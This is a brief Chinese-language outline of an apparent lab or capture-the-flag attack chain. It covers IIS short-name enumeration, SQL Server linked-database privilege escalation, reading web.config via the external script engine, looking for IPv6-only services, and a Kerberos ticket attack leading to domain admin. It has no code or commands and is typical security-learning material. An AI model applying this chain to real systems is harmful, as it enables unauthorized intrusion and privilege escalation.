Recon部分是目录枚举,利用了IIS
短名称漏洞。
Huh?! 部分是SQL Server
提权,利用了Linked Database
的错误配置导致的权限提升。
BackTrack部分是IIS
服务器的敏感文件读取C:\inetpub\wwwroot\web.config
,利用SQL Server
使用外部扩展脚本引擎时将会使我们变成另外一个用户执行,从而获得了读取web.config
的权限。
Foothold部分则是有些服务不仅仅是在ipv4地址,可能是在ipv6上,不仅仅存在TCP和UDP传输协议上的区别,有时也需要检查一下ipv6上的服务。
p00ned部分是域提权,通过拿到Kerberos的票据获取密码,然后将用户提升至域管理员权限,即可访问域控制器。